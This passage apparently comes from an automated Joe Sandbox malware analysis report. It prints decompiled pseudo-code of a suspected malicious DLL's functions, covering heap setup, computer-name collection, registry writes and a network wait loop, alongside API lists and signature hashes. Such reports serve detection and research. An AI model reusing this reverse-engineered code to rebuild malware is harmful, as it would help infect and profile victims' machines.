				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x4dea348; // 0x6bd5a8
				_t2 = _t42 + 0x4deb470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x4dea348; // 0x6bd5a8
					_t6 = _t45 + 0x4deb490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x4dea348; // 0x6bd5a8
							_t30 = _v8;
							_t12 = _t48 + 0x4deb480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                      0x04de6621
                                      0x04de6622
                                      0x04de6628
                                      0x04de662f
                                      0x04de6631
                                      0x04de6635
                                      0x04de6639
                                      0x04de663b
                                      0x04de6644
                                      0x04de664a
                                      0x04de6652
                                      0x04de6654
                                      0x04de6658
                                      0x04de665a
                                      0x04de6667
                                      0x04de666b
                                      0x04de6670
                                      0x04de6676
                                      0x04de667b
                                      0x04de6683
                                      0x04de6685
                                      0x04de6687
                                      0x04de668d
                                      0x04de668d
                                      0x04de6690
                                      0x04de6696
                                      0x04de6696
                                      0x04de6699
                                      0x04de669f
                                      0x04de669f
                                      0x04de66a6

                                      APIs
                                      • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04DE6652
                                      • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04DE6683
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Interface_ProxyQueryUnknown_
                                      • String ID:
                                      • API String ID: 2522245112-0
                                      • Opcode ID: cc814e2dd1b44ab974f7401b8de54b2f5a04eb3acc7168d44ec863da205b22f8
                                      • Instruction ID: d89b2be2c9a27e678291d81367c80345725cc8e98e3f672b47766f616db84cd7
                                      • Opcode Fuzzy Hash: cc814e2dd1b44ab974f7401b8de54b2f5a04eb3acc7168d44ec863da205b22f8
                                      • Instruction Fuzzy Hash: 8D210D75A0061AEFCB00DBA5C498D5AB779FFC8714B148688E905DB314D631FD41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE28E4 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04DE290B
                                        • Part of subcall function 04DE69D2: SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                      • SafeArrayDestroy.OLEAUT32(?), ref: 04DE295B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ArraySafe$CreateDestroyFreeString
                                      • String ID:
                                      • API String ID: 3098518882-0
                                      • Opcode ID: 084a7c9d2588f21770a13273b46e4e796069e8d1cf49937702ff68be4b856c30
                                      • Instruction ID: 351454fdfbe031b09fd504b2f28bc227197a1f50ea497a6d78891925c14e1fa0
                                      • Opcode Fuzzy Hash: 084a7c9d2588f21770a13273b46e4e796069e8d1cf49937702ff68be4b856c30
                                      • Instruction Fuzzy Hash: 42113071A0010ABFDB01EFA5DC04AEEB7B9EF04750F408055FA04A7260E675EA158B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE13F8 Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE13F8(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04DE4208(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E04DE56AD(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E04DE4C88(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x4dea2d8, 0, _t25);
				}
				return _t22;
			}











                                      0x04de13f8
                                      0x04de1409
                                      0x04de140d
                                      0x04de1468
                                      0x04de140f
                                      0x04de1416
                                      0x04de141e
                                      0x04de1421
                                      0x04de1426
                                      0x04de142a
                                      0x04de1430
                                      0x04de1438
                                      0x04de143b
                                      0x04de1453
                                      0x04de1453
                                      0x04de145e
                                      0x04de145e
                                      0x04de146f

                                      APIs
                                        • Part of subcall function 04DE4208: lstrlen.KERNEL32(?,00000000,054A9DA0,00000000,04DE2263,054A9FC3,69B25F44,?,?,?,?,69B25F44,00000005,04DEA00C,4D283A53,?), ref: 04DE420F
                                        • Part of subcall function 04DE4208: mbstowcs.NTDLL ref: 04DE4238
                                        • Part of subcall function 04DE4208: memset.NTDLL ref: 04DE424A
                                      • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,77005520,00000008,00000014,004F0053,054A93CC), ref: 04DE1430
                                      • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,77005520,00000008,00000014,004F0053,054A93CC), ref: 04DE145E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                      • String ID:
                                      • API String ID: 1500278894-0
                                      • Opcode ID: ca900eea07c23a2d4b0ac8d6d38a2a12454932949bf338993b9e4f5457f24406
                                      • Instruction ID: d4fea0b3f46040ba051408ade80553044b2d44514c3af5857b8919c288ad4a75
                                      • Opcode Fuzzy Hash: ca900eea07c23a2d4b0ac8d6d38a2a12454932949bf338993b9e4f5457f24406
                                      • Instruction Fuzzy Hash: 40018471310209BBDB117F96DC44EAF3B78FF84714F404025FA009A251E671E954D760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE78E7 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysAllocString.OLEAUT32(04DE744C), ref: 04DE7900
                                        • Part of subcall function 04DE69D2: SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE7941
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      • Opcode ID: 8566d3f9d1c70104e0bfab7d909ad3bbd01e1049a22fc14377e3011f48434407
                                      • Instruction ID: 7ae96a2dc8ed0c3079a8c41095c1b6ec5aac71d18b517e6f482a84ca5b1c564f
                                      • Opcode Fuzzy Hash: 8566d3f9d1c70104e0bfab7d909ad3bbd01e1049a22fc14377e3011f48434407
                                      • Instruction Fuzzy Hash: 2A01677560111ABFDF41EFAAD804DAF7BB8EF48710B014022FA08E7120E630ED15C7A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE1567 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E04DE1567(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04DE4DF6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04DE4C73(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                      0x04de156c
                                      0x04de1577
                                      0x04de1579
                                      0x04de157f
                                      0x04de1581
                                      0x04de1586
                                      0x04de158f
                                      0x04de1593
                                      0x04de159c
                                      0x04de15a0
                                      0x04de15af
                                      0x04de15a2
                                      0x04de15a3
                                      0x04de15a8
                                      0x04de15a8
                                      0x04de15a0
                                      0x04de1593
                                      0x04de15b8

                                      APIs
                                      • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04DE641B), ref: 04DE157F
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04DE641B), ref: 04DE159C
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ComputerHeapName$AllocateFree
                                      • String ID:
                                      • API String ID: 187446995-0
                                      • Opcode ID: 77d4af4f1d42ac2e5117072611c991ed1e2c741ceaae39955249507e4d7a2ac7
                                      • Instruction ID: 30862371856d13b98ddd0fb84c098b60747390e18aa73700146bbb42f512bd0d
                                      • Opcode Fuzzy Hash: 77d4af4f1d42ac2e5117072611c991ed1e2c741ceaae39955249507e4d7a2ac7
                                      • Instruction Fuzzy Hash: 53F05466B00105BBEB11E6AB8D04EBF77FCDBC5654F110155A905E7141EA70EE029670
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE75C6 Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE75C6(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E04DE4DF6(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x4dea348; // 0x6bd5a8
					_t5 = _t11 + 0x4deba48; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x4dea348; // 0x6bd5a8
					_t6 = _t14 + 0x4deb8f8; // 0x6d0063
					_t16 = E04DE3E6C(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E04DE4C73(_t20);
				}
				return _t18;
			}









                                      0x04de75dc
                                      0x04de75e0
                                      0x04de7620
                                      0x04de75e2
                                      0x04de75e6
                                      0x04de75ed
                                      0x04de75f5
                                      0x04de75fb
                                      0x04de7606
                                      0x04de760f
                                      0x04de7615
                                      0x04de7617
                                      0x04de7617
                                      0x04de7625

                                      APIs
                                      • lstrlenW.KERNEL32(7705F710,00000000,?,04DE2AC0,00000000,?,7705F710,00000000,7705F730), ref: 04DE75CC
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • wsprintfW.USER32 ref: 04DE75F5
                                        • Part of subcall function 04DE3E6C: memset.NTDLL ref: 04DE3E8F
                                        • Part of subcall function 04DE3E6C: GetLastError.KERNEL32 ref: 04DE3EDB
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                      • String ID:
                                      • API String ID: 1672627171-0
                                      • Opcode ID: af2a276224268af6b281964f3a0b57dcf0d76f180d457ebffbd9212f5bebb4d0
                                      • Instruction ID: bb87a6a9b4f83b8101a877ced2e10a4e8473ffb110c778e1cdc335e2269a6d95
                                      • Opcode Fuzzy Hash: af2a276224268af6b281964f3a0b57dcf0d76f180d457ebffbd9212f5bebb4d0
                                      • Instruction Fuzzy Hash: 32F0B432201615ABD751F75BEC48EAB379CDF84714F028412F504CB311D634F8518775
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3D23 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE3D23(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x4dea2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x4dea1c8 = GetTickCount();
				_t5 = E04DE515F(_a4);
				if(_t5 == 0) {
					_t5 = E04DE39B5(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E04DE6729(_t9) != 0) {
							 *0x4dea300 = 1; // executed
						}
						_t7 = E04DE2C52(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                                      0x04de3d23
                                      0x04de3d2c
                                      0x04de3d32
                                      0x04de3d39
                                      0x04de3d3d
                                      0x00000000
                                      0x04de3d3d
                                      0x04de3d4a
                                      0x04de3d4f
                                      0x04de3d56
                                      0x04de3d5c
                                      0x04de3d63
                                      0x04de3d6c
                                      0x04de3d6e
                                      0x04de3d6e
                                      0x04de3d78
                                      0x00000000
                                      0x04de3d78
                                      0x04de3d63
                                      0x04de3d7d

                                      APIs
                                      • HeapCreate.KERNEL32(00000000,00400000,00000000,04DE3DA8,?), ref: 04DE3D2C
                                      • GetTickCount.KERNEL32 ref: 04DE3D40
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CountCreateHeapTick
                                      • String ID:
                                      • API String ID: 2177101570-0
                                      • Opcode ID: 1865871dec3c2546f742be4c332c06dea154e21bff7e08c9d47e5d16e8d04f09
                                      • Instruction ID: e14d0e123b5d29526b44585351e3a3ec04abffbb9f1107b9deab4b1624061559
                                      • Opcode Fuzzy Hash: 1865871dec3c2546f742be4c332c06dea154e21bff7e08c9d47e5d16e8d04f09
                                      • Instruction Fuzzy Hash: 41F012B0380702AAEB603FB3AD25B397AD4FF04748F504465ED46DA391EB75F8019635
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE5347 Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE5347(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x4dea368; // 0x54a9618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E04DE24BC( &_v68) == 0) {
						goto L16;
					}
					_t30 = E04DE4BD6(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E04DE595A(_t31, 0x102, _t28, _t30); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E04DEA000 = E04DEA000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E04DE15B9( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x4dea30c, 0) == 0x102);
				return _t30;
			}


















                                      0x04de5347
                                      0x04de534d
                                      0x04de5354
                                      0x04de535c
                                      0x04de5362
                                      0x04de5365
                                      0x04de5367
                                      0x04de5367
                                      0x04de536f
                                      0x04de536f
                                      0x04de5379
                                      0x00000000
                                      0x00000000
                                      0x04de5388
                                      0x04de538c
                                      0x04de5390
                                      0x04de5395
                                      0x04de5399
                                      0x04de53d5
                                      0x04de53d7
                                      0x04de53d7
                                      0x04de539b
                                      0x04de53a2
                                      0x04de53cc
                                      0x04de53a4
                                      0x04de53a4
                                      0x04de53a9
                                      0x04de53c5
                                      0x04de53ab
                                      0x04de53ab
                                      0x04de53b0
                                      0x04de53b5
                                      0x04de53b8
                                      0x04de53ba
                                      0x04de53bf
                                      0x04de53c1
                                      0x04de53c1
                                      0x04de53bf
                                      0x04de53b0
                                      0x04de53a9
                                      0x04de53a2
                                      0x04de5399
                                      0x04de53e4
                                      0x04de53e9
                                      0x04de53e9
                                      0x04de540d

                                      APIs
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,770481D0), ref: 04DE53F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID:
                                      • API String ID: 24740636-0
                                      • Opcode ID: 5aac7610aeec3b4c2539dcfd1cba6b06b7a1ad1994637e1db96f42d9bbddb2c4
                                      • Instruction ID: f0b56189d6c6a8b44fb1f1cb0dbe90dbe28f34ef70fc5b653470cf6f86b77c63
                                      • Opcode Fuzzy Hash: 5aac7610aeec3b4c2539dcfd1cba6b06b7a1ad1994637e1db96f42d9bbddb2c4
                                      • Instruction Fuzzy Hash: 9C216D32700306ABDF11FE97E8A0A7E77B5FB80399F944429E9029B240DBB4ED51C761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6D05 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 34%
                                      			E04DE6D05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4dea348; // 0x6bd5a8
				_t4 = _t15 + 0x4deb39c; // 0x54a8944
				_t20 = _t4;
				_t6 = _t15 + 0x4deb124; // 0x650047
				_t17 = E04DE69D2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04DE1109(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                      0x04de6d0f
                                      0x04de6d16
                                      0x04de6d17
                                      0x04de6d18
                                      0x04de6d19
                                      0x04de6d1f
                                      0x04de6d24
                                      0x04de6d24
                                      0x04de6d2e
                                      0x04de6d40
                                      0x04de6d47
                                      0x04de6d75
                                      0x04de6d49
                                      0x04de6d4b
                                      0x04de6d50
                                      0x04de6d72
                                      0x04de6d52
                                      0x04de6d55
                                      0x04de6d5c
                                      0x04de6d61
                                      0x04de6d63
                                      0x04de6d63
                                      0x04de6d68
                                      0x04de6d68
                                      0x04de6d50
                                      0x04de6d7c

                                      APIs
                                        • Part of subcall function 04DE69D2: SysFreeString.OLEAUT32(?), ref: 04DE6AB1
                                        • Part of subcall function 04DE1109: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04DE2B23,004F0053,00000000,?), ref: 04DE1112
                                        • Part of subcall function 04DE1109: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04DE2B23,004F0053,00000000,?), ref: 04DE113C
                                        • Part of subcall function 04DE1109: memset.NTDLL ref: 04DE1150
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE6D68
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeString$lstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 397948122-0
                                      • Opcode ID: 7d142769954020193f00097b46ce8989fc651a83a067879f07b92f48e840d7bc
                                      • Instruction ID: acc1a228d769f253a22114b40b014dbaec5b9324f6e62aa3cc8ad206ba731d8a
                                      • Opcode Fuzzy Hash: 7d142769954020193f00097b46ce8989fc651a83a067879f07b92f48e840d7bc
                                      • Instruction Fuzzy Hash: 12015A7260052ABFDB11AFAACC04DBEBBB8FB04650F804425EA05A6161E771F912C7A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE267F Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 89%
                                      			E04DE267F(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E04DE215A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x4dea348; // 0x6bd5a8
						_t9 = _t17 + 0x4deba38; // 0x444f4340
						_t20 = E04DE250D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x4dea2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                      0x04de2682
                                      0x04de2688
                                      0x04de26df
                                      0x04de268e
                                      0x04de2699
                                      0x04de269e
                                      0x04de26a2
                                      0x04de26af
                                      0x04de26b7
                                      0x04de26c3
                                      0x04de26cb
                                      0x04de26d5
                                      0x04de26d5
                                      0x04de26a2
                                      0x04de26e4

                                      APIs
                                        • Part of subcall function 04DE215A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04DE2172
                                        • Part of subcall function 04DE250D: lstrlen.KERNEL32(7705F710,?,00000000,?,7705F710), ref: 04DE2541
                                        • Part of subcall function 04DE250D: StrStrA.SHLWAPI(00000000,?), ref: 04DE254E
                                        • Part of subcall function 04DE250D: RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE256D
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04DE61F6), ref: 04DE26D5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Heap$Allocate$Freelstrlen
                                      • String ID:
                                      • API String ID: 2220322926-0
                                      • Opcode ID: 42003dabf37f2c63d012fe47abc13cb8b0ee7db8ac1c01aa28ed6402cc1f15f6
                                      • Instruction ID: a0b425e24e9c5933caeecf9ed6fd736833b96715cca2a326b4177b29cb2a6b3e
